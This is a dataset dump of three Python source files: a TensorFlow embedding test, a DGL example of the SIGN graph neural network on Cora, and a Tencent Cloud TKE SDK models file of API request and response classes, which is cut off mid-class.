blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
830a140f3af9cb75dd17cf22df4d0529f9709007 | 8f1673c2abfed8f372e22fbd1c280486014b4466 | /nmt/embeddings/fresh_embedding_test.py | 02c77c2260cfcd5f01d846f377761ea8db571074 | [
"Apache-2.0"
] | permissive | naivenlp/naivenmt-legacy | be670df40a98c0f28bdacb2a3acf9a5b06667966 | bcceeec0a477eb09c4a8915e638a27dae6c95562 | refs/heads/master | 2021-10-27T02:55:33.160837 | 2019-04-15T14:39:06 | 2019-04-15T14:39:06 | 118,464,831 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | import tensorflow as tf
import numpy as np
from nmt.embeddings.fresh_embedding import FreshEmbedding
from nmt import misc_utils
class FreshEmbeddingTest(tf.test.TestCase):
def testFreshEmbedding(self):
vocab_file = misc_utils.get_test_data('iwslt15.vocab.100.en')
embedder = FreshEmbedding(vocab_file=vocab_file)
inputs = np.array([
['I', 'am', 'a', 'test']
])
inputs = tf.constant(inputs,dtype=tf.string)
length = np.array([4])
length = tf.constant(length,dtype=tf.int32)
params = {
'batch_size': 1
}
embedded = embedder.embedding(inputs, length, params)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.tables_initializer())
embedded = sess.run(embedded)
print(embedded)
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
] | |
f2ea129609ab68de9af623d8b8c473e6eb333988 | 98f1a0bfa5b20a0b81e9e555d76e706c62d949c9 | /examples/sparse/sign.py | 61ba2104d673a953ad976e5b10a35c9c2232d0b9 | [
"Apache-2.0"
] | permissive | dmlc/dgl | 3a8fbca3a7f0e9adf6e69679ad62948df48dfc42 | bbc8ff6261f2e0d2b5982e992b6fbe545e2a4aa1 | refs/heads/master | 2023-08-31T16:33:21.139163 | 2023-08-31T07:49:22 | 2023-08-31T07:49:22 | 130,375,797 | 12,631 | 3,482 | Apache-2.0 | 2023-09-14T15:48:24 | 2018-04-20T14:49:09 | Python | UTF-8 | Python | false | false | 3,804 | py | """
[SIGN: Scalable Inception Graph Neural Networks]
(https://arxiv.org/abs/2004.11198)
This example shows a simplified version of SIGN: a precomputed 2-hops diffusion
operator on top of symmetrically normalized adjacency matrix A_hat.
"""
import dgl.sparse as dglsp
import torch
import torch.nn as nn
import torch.nn.functional as F
from dgl.data import CoraGraphDataset
from torch.optim import Adam
################################################################################
# (HIGHLIGHT) Take the advantage of DGL sparse APIs to implement the feature
# diffusion in SIGN laconically.
################################################################################
def sign_diffusion(A, X, r):
# Perform the r-hop diffusion operation.
X_sign = [X]
for _ in range(r):
X = A @ X
X_sign.append(X)
return X_sign
class SIGN(nn.Module):
def __init__(self, in_size, out_size, r, hidden_size=256):
super().__init__()
# Note that theta and omega refer to the learnable matrices in the
# original paper correspondingly. The variable r refers to subscript to
# theta.
self.theta = nn.ModuleList(
[nn.Linear(in_size, hidden_size) for _ in range(r + 1)]
)
self.omega = nn.Linear(hidden_size * (r + 1), out_size)
def forward(self, X_sign):
results = []
for i in range(len(X_sign)):
results.append(self.theta[i](X_sign[i]))
Z = F.relu(torch.cat(results, dim=1))
return self.omega(Z)
def evaluate(g, pred):
label = g.ndata["label"]
val_mask = g.ndata["val_mask"]
test_mask = g.ndata["test_mask"]
# Compute accuracy on validation/test set.
val_acc = (pred[val_mask] == label[val_mask]).float().mean()
test_acc = (pred[test_mask] == label[test_mask]).float().mean()
return val_acc, test_acc
def train(model, g, X_sign):
label = g.ndata["label"]
train_mask = g.ndata["train_mask"]
optimizer = Adam(model.parameters(), lr=3e-3)
for epoch in range(10):
# Switch the model to training mode.
model.train()
# Forward.
logits = model(X_sign)
# Compute loss with nodes in training set.
loss = F.cross_entropy(logits[train_mask], label[train_mask])
# Backward.
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Switch the model to evaluating mode.
model.eval()
# Compute prediction.
logits = model(X_sign)
pred = logits.argmax(1)
# Evaluate the prediction.
val_acc, test_acc = evaluate(g, pred)
print(
f"In epoch {epoch}, loss: {loss:.3f}, val acc: {val_acc:.3f}, test"
f" acc: {test_acc:.3f}"
)
if __name__ == "__main__":
# If CUDA is available, use GPU to accelerate the training, use CPU
# otherwise.
dev = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Load graph from the existing dataset.
dataset = CoraGraphDataset()
g = dataset[0].to(dev)
# Create the sparse adjacency matrix A (note that W was used as the notation
# for adjacency matrix in the original paper).
indices = torch.stack(g.edges())
N = g.num_nodes()
A = dglsp.spmatrix(indices, shape=(N, N))
# Calculate the symmetrically normalized adjacency matrix.
I = dglsp.identity(A.shape, device=dev)
A_hat = A + I
D_hat = dglsp.diag(A_hat.sum(dim=1)) ** -0.5
A_hat = D_hat @ A_hat @ D_hat
# 2-hop diffusion.
r = 2
X = g.ndata["feat"]
X_sign = sign_diffusion(A_hat, X, r)
# Create SIGN model.
in_size = X.shape[1]
out_size = dataset.num_classes
model = SIGN(in_size, out_size, r).to(dev)
# Kick off training.
train(model, g, X_sign)
| [
"[email protected]"
] | |
7476db67d7a9a1e950e4e9ac795f4d9a8fc1af7d | bdf647d2f626578aa447258b7529f4acfdb2cfba | /tencentcloud/tke/v20180525/models.py | 26b20dc4ac138734595287fda29734009f79bad4 | [
"Apache-2.0"
] | permissive | psixdp/tencentcloud-sdk-python | 2c93528b9d7a5cec1fa38c3dd140a277abf8d26e | 7e0ec01ebb50cbfb92c60ed1f29a59b77199ccea | refs/heads/master | 2020-06-30T22:12:23.331433 | 2019-08-02T03:16:09 | 2019-08-02T03:16:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43,176 | py | # -*- coding: utf8 -*-
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tencentcloud.common.abstract_model import AbstractModel
class AddExistedInstancesRequest(AbstractModel):
"""AddExistedInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param InstanceIds: 实例列表
:type InstanceIds: list of str
:param InstanceAdvancedSettings: 实例额外需要设置参数信息
:type InstanceAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.InstanceAdvancedSettings`
:param EnhancedService: 增强服务。通过该参数可以指定是否开启云安全、云监控等服务。若不指定该参数,则默认开启云监控、云安全服务。
:type EnhancedService: :class:`tencentcloud.tke.v20180525.models.EnhancedService`
:param LoginSettings: 节点登录信息(目前仅支持使用Password或者单个KeyIds)
:type LoginSettings: :class:`tencentcloud.tke.v20180525.models.LoginSettings`
:param SecurityGroupIds: 实例所属安全组。该参数可以通过调用 DescribeSecurityGroups 的返回值中的sgId字段来获取。若不指定该参数,则绑定默认安全组。(目前仅支持设置单个sgId)
:type SecurityGroupIds: list of str
"""
self.ClusterId = None
self.InstanceIds = None
self.InstanceAdvancedSettings = None
self.EnhancedService = None
self.LoginSettings = None
self.SecurityGroupIds = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.InstanceIds = params.get("InstanceIds")
if params.get("InstanceAdvancedSettings") is not None:
self.InstanceAdvancedSettings = InstanceAdvancedSettings()
self.InstanceAdvancedSettings._deserialize(params.get("InstanceAdvancedSettings"))
if params.get("EnhancedService") is not None:
self.EnhancedService = EnhancedService()
self.EnhancedService._deserialize(params.get("EnhancedService"))
if params.get("LoginSettings") is not None:
self.LoginSettings = LoginSettings()
self.LoginSettings._deserialize(params.get("LoginSettings"))
self.SecurityGroupIds = params.get("SecurityGroupIds")
class AddExistedInstancesResponse(AbstractModel):
"""AddExistedInstances返回参数结构体
"""
def __init__(self):
"""
:param FailedInstanceIds: 失败的节点ID
:type FailedInstanceIds: list of str
:param SuccInstanceIds: 成功的节点ID
:type SuccInstanceIds: list of str
:param TimeoutInstanceIds: 超时未返回出来节点的ID(可能失败,也可能成功)
:type TimeoutInstanceIds: list of str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.FailedInstanceIds = None
self.SuccInstanceIds = None
self.TimeoutInstanceIds = None
self.RequestId = None
def _deserialize(self, params):
self.FailedInstanceIds = params.get("FailedInstanceIds")
self.SuccInstanceIds = params.get("SuccInstanceIds")
self.TimeoutInstanceIds = params.get("TimeoutInstanceIds")
self.RequestId = params.get("RequestId")
class Cluster(AbstractModel):
"""集群信息结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param ClusterName: 集群名称
:type ClusterName: str
:param ClusterDescription: 集群描述
:type ClusterDescription: str
:param ClusterVersion: 集群版本(默认值为1.10.5)
:type ClusterVersion: str
:param ClusterOs: 集群系统。centos7.2x86_64 或者 ubuntu16.04.1 LTSx86_64,默认取值为ubuntu16.04.1 LTSx86_64
:type ClusterOs: str
:param ClusterType: 集群类型,托管集群:MANAGED_CLUSTER,独立集群:INDEPENDENT_CLUSTER。
:type ClusterType: str
:param ClusterNetworkSettings: 集群网络相关参数
:type ClusterNetworkSettings: :class:`tencentcloud.tke.v20180525.models.ClusterNetworkSettings`
:param ClusterNodeNum: 集群当前node数量
:type ClusterNodeNum: int
:param ProjectId: 集群所属的项目ID
:type ProjectId: int
"""
self.ClusterId = None
self.ClusterName = None
self.ClusterDescription = None
self.ClusterVersion = None
self.ClusterOs = None
self.ClusterType = None
self.ClusterNetworkSettings = None
self.ClusterNodeNum = None
self.ProjectId = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.ClusterDescription = params.get("ClusterDescription")
self.ClusterVersion = params.get("ClusterVersion")
self.ClusterOs = params.get("ClusterOs")
self.ClusterType = params.get("ClusterType")
if params.get("ClusterNetworkSettings") is not None:
self.ClusterNetworkSettings = ClusterNetworkSettings()
self.ClusterNetworkSettings._deserialize(params.get("ClusterNetworkSettings"))
self.ClusterNodeNum = params.get("ClusterNodeNum")
self.ProjectId = params.get("ProjectId")
class ClusterAdvancedSettings(AbstractModel):
"""集群高级配置
"""
def __init__(self):
"""
:param IPVS: 是否启用IPVS
:type IPVS: bool
:param AsEnabled: 是否启用集群节点扩缩容
:type AsEnabled: bool
:param ContainerRuntime: 集群使用的runtime类型,包括"docker"和"containerd"两种类型,默认为"docker"
:type ContainerRuntime: str
"""
self.IPVS = None
self.AsEnabled = None
self.ContainerRuntime = None
def _deserialize(self, params):
self.IPVS = params.get("IPVS")
self.AsEnabled = params.get("AsEnabled")
self.ContainerRuntime = params.get("ContainerRuntime")
class ClusterBasicSettings(AbstractModel):
"""描述集群的基本配置信息
"""
def __init__(self):
"""
:param ClusterOs: 集群系统。centos7.2x86_64 或者 ubuntu16.04.1 LTSx86_64,默认取值为ubuntu16.04.1 LTSx86_64
:type ClusterOs: str
:param ClusterVersion: 集群版本,默认值为1.10.5
:type ClusterVersion: str
:param ClusterName: 集群名称
:type ClusterName: str
:param ClusterDescription: 集群描述
:type ClusterDescription: str
:param VpcId: 私有网络ID,形如vpc-xxx。创建托管空集群时必传。
:type VpcId: str
:param ProjectId: 集群内新增资源所属项目ID。
:type ProjectId: int
"""
self.ClusterOs = None
self.ClusterVersion = None
self.ClusterName = None
self.ClusterDescription = None
self.VpcId = None
self.ProjectId = None
def _deserialize(self, params):
self.ClusterOs = params.get("ClusterOs")
self.ClusterVersion = params.get("ClusterVersion")
self.ClusterName = params.get("ClusterName")
self.ClusterDescription = params.get("ClusterDescription")
self.VpcId = params.get("VpcId")
self.ProjectId = params.get("ProjectId")
class ClusterCIDRSettings(AbstractModel):
"""集群容器网络相关参数
"""
def __init__(self):
"""
:param ClusterCIDR: 用于分配集群容器和服务 IP 的 CIDR,不得与 VPC CIDR 冲突,也不得与同 VPC 内其他集群 CIDR 冲突
:type ClusterCIDR: str
:param IgnoreClusterCIDRConflict: 是否忽略 ClusterCIDR 冲突错误, 默认不忽略
:type IgnoreClusterCIDRConflict: bool
:param MaxNodePodNum: 集群中每个Node上最大的Pod数量
:type MaxNodePodNum: int
:param MaxClusterServiceNum: 集群最大的service数量
:type MaxClusterServiceNum: int
"""
self.ClusterCIDR = None
self.IgnoreClusterCIDRConflict = None
self.MaxNodePodNum = None
self.MaxClusterServiceNum = None
def _deserialize(self, params):
self.ClusterCIDR = params.get("ClusterCIDR")
self.IgnoreClusterCIDRConflict = params.get("IgnoreClusterCIDRConflict")
self.MaxNodePodNum = params.get("MaxNodePodNum")
self.MaxClusterServiceNum = params.get("MaxClusterServiceNum")
class ClusterNetworkSettings(AbstractModel):
"""集群网络相关的参数
"""
def __init__(self):
"""
:param ClusterCIDR: 用于分配集群容器和服务 IP 的 CIDR,不得与 VPC CIDR 冲突,也不得与同 VPC 内其他集群 CIDR 冲突
:type ClusterCIDR: str
:param IgnoreClusterCIDRConflict: 是否忽略 ClusterCIDR 冲突错误, 默认不忽略
:type IgnoreClusterCIDRConflict: bool
:param MaxNodePodNum: 集群中每个Node上最大的Pod数量(默认为256)
:type MaxNodePodNum: int
:param MaxClusterServiceNum: 集群最大的service数量(默认为256)
:type MaxClusterServiceNum: int
:param Ipvs: 是否启用IPVS(默认不开启)
:type Ipvs: bool
:param VpcId: 集群的VPCID(如果创建空集群,为必传值,否则自动设置为和集群的节点保持一致)
:type VpcId: str
:param Cni: 网络插件是否启用CNI(默认开启)
:type Cni: bool
"""
self.ClusterCIDR = None
self.IgnoreClusterCIDRConflict = None
self.MaxNodePodNum = None
self.MaxClusterServiceNum = None
self.Ipvs = None
self.VpcId = None
self.Cni = None
def _deserialize(self, params):
self.ClusterCIDR = params.get("ClusterCIDR")
self.IgnoreClusterCIDRConflict = params.get("IgnoreClusterCIDRConflict")
self.MaxNodePodNum = params.get("MaxNodePodNum")
self.MaxClusterServiceNum = params.get("MaxClusterServiceNum")
self.Ipvs = params.get("Ipvs")
self.VpcId = params.get("VpcId")
self.Cni = params.get("Cni")
class CreateClusterInstancesRequest(AbstractModel):
"""CreateClusterInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群 ID,请填写 查询集群列表 接口中返回的 clusterId 字段
:type ClusterId: str
:param RunInstancePara: CVM创建透传参数,json化字符串格式,详见[CVM创建实例](https://cloud.tencent.com/document/product/213/15730)接口。
:type RunInstancePara: str
:param InstanceAdvancedSettings: 实例额外需要设置参数信息
:type InstanceAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.InstanceAdvancedSettings`
"""
self.ClusterId = None
self.RunInstancePara = None
self.InstanceAdvancedSettings = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.RunInstancePara = params.get("RunInstancePara")
if params.get("InstanceAdvancedSettings") is not None:
self.InstanceAdvancedSettings = InstanceAdvancedSettings()
self.InstanceAdvancedSettings._deserialize(params.get("InstanceAdvancedSettings"))
class CreateClusterInstancesResponse(AbstractModel):
"""CreateClusterInstances返回参数结构体
"""
def __init__(self):
"""
:param InstanceIdSet: 节点实例ID
:type InstanceIdSet: list of str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.InstanceIdSet = None
self.RequestId = None
def _deserialize(self, params):
self.InstanceIdSet = params.get("InstanceIdSet")
self.RequestId = params.get("RequestId")
class CreateClusterRequest(AbstractModel):
"""CreateCluster请求参数结构体
"""
def __init__(self):
"""
:param ClusterCIDRSettings: 集群容器网络配置信息
:type ClusterCIDRSettings: :class:`tencentcloud.tke.v20180525.models.ClusterCIDRSettings`
:param ClusterType: 集群类型,托管集群:MANAGED_CLUSTER,独立集群:INDEPENDENT_CLUSTER。
:type ClusterType: str
:param RunInstancesForNode: CVM创建透传参数,json化字符串格式,详见[CVM创建实例](https://cloud.tencent.com/document/product/213/15730)接口。
:type RunInstancesForNode: list of RunInstancesForNode
:param ClusterBasicSettings: 集群的基本配置信息
:type ClusterBasicSettings: :class:`tencentcloud.tke.v20180525.models.ClusterBasicSettings`
:param ClusterAdvancedSettings: 集群高级配置信息
:type ClusterAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.ClusterAdvancedSettings`
:param InstanceAdvancedSettings: 节点高级配置信息
:type InstanceAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.InstanceAdvancedSettings`
:param ExistedInstancesForNode: 已存在实例的配置信息
:type ExistedInstancesForNode: list of ExistedInstancesForNode
"""
self.ClusterCIDRSettings = None
self.ClusterType = None
self.RunInstancesForNode = None
self.ClusterBasicSettings = None
self.ClusterAdvancedSettings = None
self.InstanceAdvancedSettings = None
self.ExistedInstancesForNode = None
def _deserialize(self, params):
if params.get("ClusterCIDRSettings") is not None:
self.ClusterCIDRSettings = ClusterCIDRSettings()
self.ClusterCIDRSettings._deserialize(params.get("ClusterCIDRSettings"))
self.ClusterType = params.get("ClusterType")
if params.get("RunInstancesForNode") is not None:
self.RunInstancesForNode = []
for item in params.get("RunInstancesForNode"):
obj = RunInstancesForNode()
obj._deserialize(item)
self.RunInstancesForNode.append(obj)
if params.get("ClusterBasicSettings") is not None:
self.ClusterBasicSettings = ClusterBasicSettings()
self.ClusterBasicSettings._deserialize(params.get("ClusterBasicSettings"))
if params.get("ClusterAdvancedSettings") is not None:
self.ClusterAdvancedSettings = ClusterAdvancedSettings()
self.ClusterAdvancedSettings._deserialize(params.get("ClusterAdvancedSettings"))
if params.get("InstanceAdvancedSettings") is not None:
self.InstanceAdvancedSettings = InstanceAdvancedSettings()
self.InstanceAdvancedSettings._deserialize(params.get("InstanceAdvancedSettings"))
if params.get("ExistedInstancesForNode") is not None:
self.ExistedInstancesForNode = []
for item in params.get("ExistedInstancesForNode"):
obj = ExistedInstancesForNode()
obj._deserialize(item)
self.ExistedInstancesForNode.append(obj)
class CreateClusterResponse(AbstractModel):
"""CreateCluster返回参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.ClusterId = None
self.RequestId = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.RequestId = params.get("RequestId")
class DeleteClusterInstancesRequest(AbstractModel):
"""DeleteClusterInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param InstanceIds: 主机InstanceId列表
:type InstanceIds: list of str
:param InstanceDeleteMode: 集群实例删除时的策略:terminate(销毁实例,仅支持按量计费云主机实例) retain (仅移除,保留实例)
:type InstanceDeleteMode: str
"""
self.ClusterId = None
self.InstanceIds = None
self.InstanceDeleteMode = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.InstanceIds = params.get("InstanceIds")
self.InstanceDeleteMode = params.get("InstanceDeleteMode")
class DeleteClusterInstancesResponse(AbstractModel):
"""DeleteClusterInstances返回参数结构体
"""
def __init__(self):
"""
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.RequestId = None
def _deserialize(self, params):
self.RequestId = params.get("RequestId")
class DeleteClusterRequest(AbstractModel):
"""DeleteCluster请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param InstanceDeleteMode: 集群实例删除时的策略:terminate(销毁实例,仅支持按量计费云主机实例) retain (仅移除,保留实例)
:type InstanceDeleteMode: str
"""
self.ClusterId = None
self.InstanceDeleteMode = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.InstanceDeleteMode = params.get("InstanceDeleteMode")
class DeleteClusterResponse(AbstractModel):
"""DeleteCluster返回参数结构体
"""
def __init__(self):
"""
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.RequestId = None
def _deserialize(self, params):
self.RequestId = params.get("RequestId")
class DescribeClusterInstancesRequest(AbstractModel):
"""DescribeClusterInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param Offset: 偏移量,默认0
:type Offset: int
:param Limit: 最大输出条数,默认20
:type Limit: int
:param InstanceIds: 需要获取的节点实例Id列表(默认为空,表示拉取集群下所有节点实例)
:type InstanceIds: list of str
"""
self.ClusterId = None
self.Offset = None
self.Limit = None
self.InstanceIds = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.Offset = params.get("Offset")
self.Limit = params.get("Limit")
self.InstanceIds = params.get("InstanceIds")
class DescribeClusterInstancesResponse(AbstractModel):
"""DescribeClusterInstances返回参数结构体
"""
def __init__(self):
"""
:param TotalCount: 集群中实例总数
:type TotalCount: int
:param InstanceSet: 集群中实例列表
:type InstanceSet: list of Instance
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.TotalCount = None
self.InstanceSet = None
self.RequestId = None
def _deserialize(self, params):
self.TotalCount = params.get("TotalCount")
if params.get("InstanceSet") is not None:
self.InstanceSet = []
for item in params.get("InstanceSet"):
obj = Instance()
obj._deserialize(item)
self.InstanceSet.append(obj)
self.RequestId = params.get("RequestId")
class DescribeClusterSecurityRequest(AbstractModel):
"""DescribeClusterSecurity请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群 ID,请填写 查询集群列表 接口中返回的 clusterId 字段
:type ClusterId: str
"""
self.ClusterId = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
class DescribeClusterSecurityResponse(AbstractModel):
"""DescribeClusterSecurity返回参数结构体
"""
def __init__(self):
"""
:param UserName: 集群的账号名称
:type UserName: str
:param Password: 集群的访问密码
:type Password: str
:param CertificationAuthority: 集群访问CA证书
:type CertificationAuthority: str
:param ClusterExternalEndpoint: 集群访问的地址
:type ClusterExternalEndpoint: str
:param Domain: 集群访问的域名
:type Domain: str
:param PgwEndpoint: 集群Endpoint地址
:type PgwEndpoint: str
:param SecurityPolicy: 集群访问策略组
:type SecurityPolicy: list of str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.UserName = None
self.Password = None
self.CertificationAuthority = None
self.ClusterExternalEndpoint = None
self.Domain = None
self.PgwEndpoint = None
self.SecurityPolicy = None
self.RequestId = None
def _deserialize(self, params):
self.UserName = params.get("UserName")
self.Password = params.get("Password")
self.CertificationAuthority = params.get("CertificationAuthority")
self.ClusterExternalEndpoint = params.get("ClusterExternalEndpoint")
self.Domain = params.get("Domain")
self.PgwEndpoint = params.get("PgwEndpoint")
self.SecurityPolicy = params.get("SecurityPolicy")
self.RequestId = params.get("RequestId")
class DescribeClustersRequest(AbstractModel):
"""DescribeClusters请求参数结构体
"""
def __init__(self):
"""
:param ClusterIds: 集群ID列表(为空时,
表示获取账号下所有集群)
:type ClusterIds: list of str
:param Offset: 偏移量,默认0
:type Offset: int
:param Limit: 最大输出条数,默认20
:type Limit: int
:param Filters: 过滤条件,当前只支持按照单个条件ClusterName进行过滤
:type Filters: list of Filter
"""
self.ClusterIds = None
self.Offset = None
self.Limit = None
self.Filters = None
def _deserialize(self, params):
self.ClusterIds = params.get("ClusterIds")
self.Offset = params.get("Offset")
self.Limit = params.get("Limit")
if params.get("Filters") is not None:
self.Filters = []
for item in params.get("Filters"):
obj = Filter()
obj._deserialize(item)
self.Filters.append(obj)
class DescribeClustersResponse(AbstractModel):
"""DescribeClusters返回参数结构体
"""
def __init__(self):
"""
:param TotalCount: 集群总个数
:type TotalCount: int
:param Clusters: 集群信息列表
:type Clusters: list of Cluster
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.TotalCount = None
self.Clusters = None
self.RequestId = None
def _deserialize(self, params):
self.TotalCount = params.get("TotalCount")
if params.get("Clusters") is not None:
self.Clusters = []
for item in params.get("Clusters"):
obj = Cluster()
obj._deserialize(item)
self.Clusters.append(obj)
self.RequestId = params.get("RequestId")
class DescribeExistedInstancesRequest(AbstractModel):
"""DescribeExistedInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群 ID,请填写查询集群列表 接口中返回的 ClusterId 字段(仅通过ClusterId获取需要过滤条件中的VPCID,比较状态时会使用该地域下所有集群中的节点进行比较。参数不支持同时指定InstanceIds和ClusterId。
:type ClusterId: str
:param InstanceIds: 按照一个或者多个实例ID查询。实例ID形如:ins-xxxxxxxx。(此参数的具体格式可参考API简介的id.N一节)。每次请求的实例的上限为100。参数不支持同时指定InstanceIds和Filters。
:type InstanceIds: list of str
:param Filters: 过滤条件,字段和详见[CVM查询实例](https://cloud.tencent.com/document/api/213/15728)如果设置了ClusterId,会附加集群的VPCID作为查询字段,在此情况下如果在Filter中指定了"vpc-id"作为过滤字段,指定的VPCID必须与集群的VPCID相同。
:type Filters: :class:`tencentcloud.tke.v20180525.models.Filter`
:param VagueIpAddress: 实例IP进行过滤(同时支持内网IP和外网IP)
:type VagueIpAddress: str
:param VagueInstanceName: 实例名称进行过滤
:type VagueInstanceName: str
:param Offset: 偏移量,默认为0。关于Offset的更进一步介绍请参考 API [简介](https://cloud.tencent.com/document/api/213/15688)中的相关小节。
:type Offset: int
:param Limit: 返回数量,默认为20,最大值为100。关于Limit的更进一步介绍请参考 API [简介](https://cloud.tencent.com/document/api/213/15688)中的相关小节。
:type Limit: int
"""
self.ClusterId = None
self.InstanceIds = None
self.Filters = None
self.VagueIpAddress = None
self.VagueInstanceName = None
self.Offset = None
self.Limit = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.InstanceIds = params.get("InstanceIds")
if params.get("Filters") is not None:
self.Filters = Filter()
self.Filters._deserialize(params.get("Filters"))
self.VagueIpAddress = params.get("VagueIpAddress")
self.VagueInstanceName = params.get("VagueInstanceName")
self.Offset = params.get("Offset")
self.Limit = params.get("Limit")
class DescribeExistedInstancesResponse(AbstractModel):
"""DescribeExistedInstances返回参数结构体
"""
def __init__(self):
"""
:param ExistedInstanceSet: 已经存在的实例信息数组。
注意:此字段可能返回 null,表示取不到有效值。
:type ExistedInstanceSet: list of ExistedInstance
:param TotalCount: 符合条件的实例数量。
:type TotalCount: int
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.ExistedInstanceSet = None
self.TotalCount = None
self.RequestId = None
def _deserialize(self, params):
if params.get("ExistedInstanceSet") is not None:
self.ExistedInstanceSet = []
for item in params.get("ExistedInstanceSet"):
obj = ExistedInstance()
obj._deserialize(item)
self.ExistedInstanceSet.append(obj)
self.TotalCount = params.get("TotalCount")
self.RequestId = params.get("RequestId")
class EnhancedService(AbstractModel):
"""描述了实例的增强服务启用情况与其设置,如云安全,云监控等实例 Agent
"""
def __init__(self):
"""
:param SecurityService: 开启云安全服务。若不指定该参数,则默认开启云安全服务。
:type SecurityService: :class:`tencentcloud.tke.v20180525.models.RunSecurityServiceEnabled`
:param MonitorService: 开启云监控服务。若不指定该参数,则默认开启云监控服务。
:type MonitorService: :class:`tencentcloud.tke.v20180525.models.RunMonitorServiceEnabled`
"""
self.SecurityService = None
self.MonitorService = None
def _deserialize(self, params):
if params.get("SecurityService") is not None:
self.SecurityService = RunSecurityServiceEnabled()
self.SecurityService._deserialize(params.get("SecurityService"))
if params.get("MonitorService") is not None:
self.MonitorService = RunMonitorServiceEnabled()
self.MonitorService._deserialize(params.get("MonitorService"))
class ExistedInstance(AbstractModel):
"""已经存在的实例信息
"""
def __init__(self):
"""
:param Usable: 实例是否支持加入集群(TRUE 可以加入 FALSE 不能加入)。
注意:此字段可能返回 null,表示取不到有效值。
:type Usable: bool
:param UnusableReason: 实例不支持加入的原因。
注意:此字段可能返回 null,表示取不到有效值。
:type UnusableReason: str
:param AlreadyInCluster: 实例已经所在的集群ID。
注意:此字段可能返回 null,表示取不到有效值。
:type AlreadyInCluster: str
:param InstanceId: 实例ID形如:ins-xxxxxxxx。
:type InstanceId: str
:param InstanceName: 实例名称。
注意:此字段可能返回 null,表示取不到有效值。
:type InstanceName: str
:param PrivateIpAddresses: 实例主网卡的内网IP列表。
注意:此字段可能返回 null,表示取不到有效值。
:type PrivateIpAddresses: list of str
:param PublicIpAddresses: 实例主网卡的公网IP列表。
注意:此字段可能返回 null,表示取不到有效值。
